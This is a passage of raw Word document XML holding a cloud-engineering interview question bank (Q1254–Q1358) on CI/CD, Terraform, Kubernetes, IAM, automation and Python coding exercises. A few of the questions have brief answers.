        <w:t>Q1254. Scenario: The JD expects weekly deployments or better. How would you improve a team deploying once per month?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1255. How would you implement trunk-based development in a regulated environment?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1256. Scenario: A team has inconsistent branching and release practices. How would you standardize them?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1257. How do you design a CI/CD pipeline for cloud applications using GitHub, Cloud Build, Artifactory, and ArgoCD?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1258. Scenario: A deployment through ArgoCD is stuck OutOfSync. How would you troubleshoot it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1259. How do you use Infrastructure as Code consistently across cloud environments?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1260. Scenario: Terraform drift is causing production uncertainty. What process would you introduce?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1261. How would you structure Terraform modules for a cloud platform team?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1262. Scenario: Terraform wants to replace a production resource. How do you handle it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1263. How do you secure Terraform state?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1264. Scenario: A Terraform pipeline passes locally but fails in CI. What would you check?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1265. How would you design cloud governance for naming, tagging, and policy controls?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1266. Scenario: Many cloud resources have no owner or cost tags. What would you do?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1267. How do you implement least privilege IAM in GCP and Azure?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1268. Scenario: A production service account has excessive permissions. How would you remediate safely?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1269. How do you embed DevSecOps controls into CI/CD?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1270. Scenario: A secret is found in a Git repository. What immediate and long-term steps do you take?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1271. How do you conduct a cloud security review?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1272. Scenario: A vulnerability scan blocks a production release. How would you respond?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1273. How do you design observability for distributed systems?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1274. Scenario: Users report slowness but infrastructure dashboards look normal. What would you check?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1275. How would you implement monitoring, logging, and alerting for Kubernetes applications?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1276. Scenario: Kubernetes pods are restarting after a release. How would you troubleshoot?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1277. How do you design Kubernetes deployment orchestration with ArgoCD?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1278. Scenario: A Kubernetes deployment succeeds but traffic still goes to the old version. What would you check?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1279. How would you design Kubernetes clusters for high availability?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1280. Scenario: A GKE or AKS node upgrade is blocked. What would you investigate?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1281. How do you support both Azure and GCP cloud services as a cloud engineer?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1282. Scenario: You need to migrate a workload from manual deployment to CI/CD. What is your approach?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1283. How would you build automated runbooks for resilient operations?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1284. Scenario: A runbook fixed an incident once but failed the next time. What would you improve?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1285. How do you shift-left QA, security, and operations into the SDLC?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1286. Scenario: A team says security checks slow delivery. How do you handle it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1287. How would you measure platform perceived performance?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1288. Scenario: Customer-facing latency increases after a release. How would you lead the response?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1289. How do error budgets influence release decisions?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1290. Scenario: Error budget is almost exhausted but a business feature must ship. What do you recommend?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1291. How do you improve developer productivity through platform engineering?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1292. Scenario: Developers bypass the platform because it is too slow. What would you do?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1293. How would you create and maintain engineering standards?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1294. Scenario: Different teams use different CI/CD tools. How would you standardize without causing disruption?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1295. How do you handle change control in a high-compliance environment?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1296. Scenario: An emergency production fix is needed outside normal change windows. What is your process?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1297. How would you design release management for weekly production deployments?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1298. Scenario: A weekly release fails repeatedly in production. What systemic issues would you investigate?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1299. How would you design architecture diagrams and deployment guides that engineers actually use?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1300. Scenario: A production incident happens and there is no runbook or architecture diagram. What do you do after recovery?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1301. How do you approach threat modeling for cloud workloads?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1302. Scenario: A new cloud design includes public endpoints and sensitive customer data. What questions would you ask?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1303. How do you incorporate customer fairness and regulatory expectations into engineering decisions?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1304. Scenario: A reliability improvement increases cost. How do you justify it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1305. How do you balance cost efficiency with high availability?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1306. Scenario: Cloud costs rise after adopting Kubernetes. What would you investigate?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1307. How would you demonstrate senior-level ownership in this Cloud Engineering role?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1308. Scenario: You are joining this team in the first 90 days. What would your plan be?</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Scripting &amp; Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1309. Python automation: Design a production-ready script that inventories all GCP projects, collects labels and owners, and exports non-compliant resources to CSV.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1310. Python automation: How would you automate GKE namespace creation with quotas, RBAC, network policies, labels, and audit logging?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1311. Bash automation: Write the approach for a shell script that checks disk, memory, CPU, failed systemd units, and endpoint health across Linux servers.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1312. GCP SDK automation: How would you build a Python tool that disables stale service-account keys only after approval and records every action?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1313. Kubernetes automation: Design a script that finds CrashLoopBackOff, ImagePullBackOff, pending, and frequently restarted pods across all namespaces.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1314. Terraform automation: How would you automate fmt, validate, lint, security scanning, plan generation, policy checks, and plan summaries in CI?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1315. Log automation: Build an approach to parse application logs, group errors by service and exception, and report the top failures during an incident.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1316. API automation: How would you implement pagination, retries, exponential backoff, rate-limit handling, authentication, and idempotency in a cloud API client?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1317. Configuration automation: How would you safely update YAML configuration across many repositories without destroying formatting or unrelated settings?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1318. Certificate automation: Design a job that discovers expiring TLS certificates, alerts owners, validates renewals, and avoids duplicate notifications.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1319. Cost automation: How would you create a daily GCP cost anomaly report by project, service, label, and team?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1320. Backup automation: Design a script that runs backups, validates checksums, tests restoration, enforces retention, and reports RPO compliance.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1321. CI/CD automation: How would you automatically promote one immutable artifact through development, staging, and production with approvals and rollback?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1322. Security automation: Build a workflow that scans public buckets, open firewall rules, overprivileged IAM roles, and unencrypted resources.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1323. Incident automation: Which incident-response steps should be automated, and which must remain human-controlled?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1324. Python testing: How would you test a cloud automation script without modifying real production resources?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1325. Secrets automation: How would you retrieve and rotate secrets without printing them in logs, command history, process arguments, or CI output?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1326. Scheduled automation: Compare cron, Kubernetes CronJobs, Cloud Scheduler with Cloud Run, and workflow orchestration for operational jobs.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1327. Automation reliability: How would you add dry-run mode, structured logging, metrics, checkpoints, locking, retries, and rollback to a destructive script?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1328. Automation ownership: How would you package, document, release, monitor, and support internal automation used by several engineering teams?</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Coding Exercises</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1329. Python coding: Write a function that reads Kubernetes pod records and returns pods with restartCount above a threshold, grouped by namespace.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1330. Python coding: Write a log parser that counts HTTP status codes and prints the five endpoints with the highest 5xx count.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1331. Python coding: Implement exponential backoff with jitter for an API call, with a maximum retry count and retryable-status handling.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1332. Python coding: Write a function that flattens nested JSON into dot-separated keys while preserving list values.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1333. Python coding: Write a function that compares desired and actual GCP resource labels and returns missing, changed, and unexpected labels.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1334. Python coding: Implement a thread-safe rate limiter that allows a configurable number of API requests per minute.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1335. Python coding: Write a script that finds duplicate IP addresses and overlapping CIDR ranges from a list of network definitions.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1336. Python coding: Write a function that calculates SLO compliance and remaining error budget from total and failed request counts.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1337. Python coding: Parse Prometheus text-format metrics and return samples whose metric name and labels match given filters.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1338. Python coding: Write a function that selects the latest valid semantic version from a list of container image tags.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1339. Python coding: Implement a context manager that records operation duration and emits structured success or failure logs.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1340. Python coding: Write unit tests for a function that deletes old cloud snapshots, including dry-run, API failure, and retention exceptions.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1341. Python coding: Write a script that reads a CSV of users and roles, validates allowed roles, and produces an IAM change plan without applying it.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1342. Python coding: Implement a bounded worker pool that processes cloud resources concurrently while preserving errors for a final report.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1343. Python coding: Write a function that detects configuration drift between two nested dictionaries while ignoring approved keys.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1344. Today interview 2026-07-06 - Python coding equality: Write a function to compare two values using == and return the result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def values_equal(a, b):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return a == b</w:t>
        <w:br/>
        <w:br/>
        <w:t>This returns True when the two inputs are equal by value according to their type's __eq__ method, and False otherwise. For example, values_equal([1, 2], [1, 2]) returns True because the list values match, even though the two lists are separate objects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1345. Today interview 2026-07-06 - Python coding identity output: Given a = [1, 2], b = [1, 2], and c = a, what do print(a == b), print(a is b), and print(a is c) output and why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: a == b prints True because both lists contain the same values in the same order. a is b prints False because a and b are two different list objects in memory. a is c prints True because c references the exact same object as a. Interview shortcut: == means value equality; is means identity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1346. Today interview 2026-07-06 - Python coding multiprocessing example: Write a small Python multiprocessing example using Process, start, and join.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: from multiprocessing import Process</w:t>
        <w:br/>
        <w:br/>
        <w:t>def worker():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    print("Running")</w:t>
        <w:br/>
        <w:br/>
        <w:t>if __name__ == "__main__":</w:t>
        <w:br/>
        <w:t xml:space="preserve">    p = Process(target=worker)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    p.start()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    p.join()</w:t>
        <w:br/>
        <w:br/>
        <w:t>Process creates a separate Python process, start begins execution, and join waits for that child process to finish. The if __name__ == "__main__" guard is important, especially on Windows and macOS spawn-based process starts, to prevent child processes from re-importing the module and recursively creating more processes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1347. Bash coding: Write a script that exits non-zero when disk usage exceeds a threshold and prints the five largest directories safely.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1348. Bash coding: Write a script that checks an HTTP endpoint with timeout and retries, then emits a machine-readable health result.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1349. Kubernetes coding: Write a Python program using the Kubernetes client that lists unschedulable pods and summarizes their scheduling reasons.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1350. GCP coding: Write a Python program using Google Cloud client libraries that lists public Cloud Storage buckets and handles permission errors.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1351. Terraform coding: Write a validation strategy or test that rejects resources missing required labels and prevents public ingress on port 22.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1352. Anagram check: Write a program to check whether two strings are anagrams of each other.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def is_anagram(a, b):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    a, b = a.replace(" ", "").lower(), b.replace(" ", "").lower()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if len(a) != len(b):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return False</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return sorted(a) == sorted(b)</w:t>
        <w:br/>
        <w:b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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1353. Find the single unique element: Given an array where every element appears twice except one, write an optimized program to find the unique element.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: from functools import reduce</w:t>
        <w:br/>
        <w:t>def find_unique(nums):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return reduce(lambda a, b: a ^ b, nums)</w:t>
        <w:br/>
        <w:b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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1354. Time complexity: What is the time and space complexity of your solution to find the single unique element, and why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1355. XOR trick limitation: Why does the XOR trick fail to find the unique element when there are multiple non-duplicated elements instead of just one?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1356. HackerRank arrays - minimum swaps: Given a permutation of integers from 1 to n, implement minimum_swaps(arr) to return the minimum swaps required to sort it. Target O(n) time and explain cycle decomposition. Test cases: [4, 3, 1, 2] -&gt; 3; [1, 2, 3] -&gt; 0; [2, 1] -&gt; 1.</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arrays - minimum swaps: Given a permutation of integers from 1 to n, implement minimum_swaps(arr) to return the minimum swaps required to sort it. Target O(n) time and explain cycle decomposition. Test cases: [4, 3, 1, 2] -&gt; 3; [1, 2, 3] -&gt; 0; [2, 1] -&gt; 1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1357. HackerRank arrays - array manipulation: You are given n zero-initialized elements and queries [left, right, value] that add value to every element in the inclusive range. Return the maximum value without updating every element of every range. Test cases: n=5, queries=[[1,2,100],[2,5,100],[3,4,100]] -&gt; 200; n=1, queries=[]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arrays - array manipulation: You are given n zero-initialized elements and queries [left, right, value] that add value to every element in the inclusive range. Return the maximum value without updating every element of every range. Test cases: n=5, queries=[[1,2,100],[2,5,100],[3,4,100]] -&gt; 200; n=1, queries=[] -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1358. HackerRank strings - Sherlock anagrams: Given a lowercase string, count unordered pairs of substrings that are anagrams. Define how you canonicalize substrings and analyze complexity. Test cases: 'abba' -&gt; 4; 'abcd' -&gt; 0; 'kkkk' -&gt; 10.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strings - Sherlock anagrams: Given a lowercase string, count unordered pairs of substrings that are anagrams. Define how you canonicalize substrings and analyze complexity. Test cases: 'abba' -&gt; 4; 'abcd' -&gt; 0; 'kkkk' -&gt; 10.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
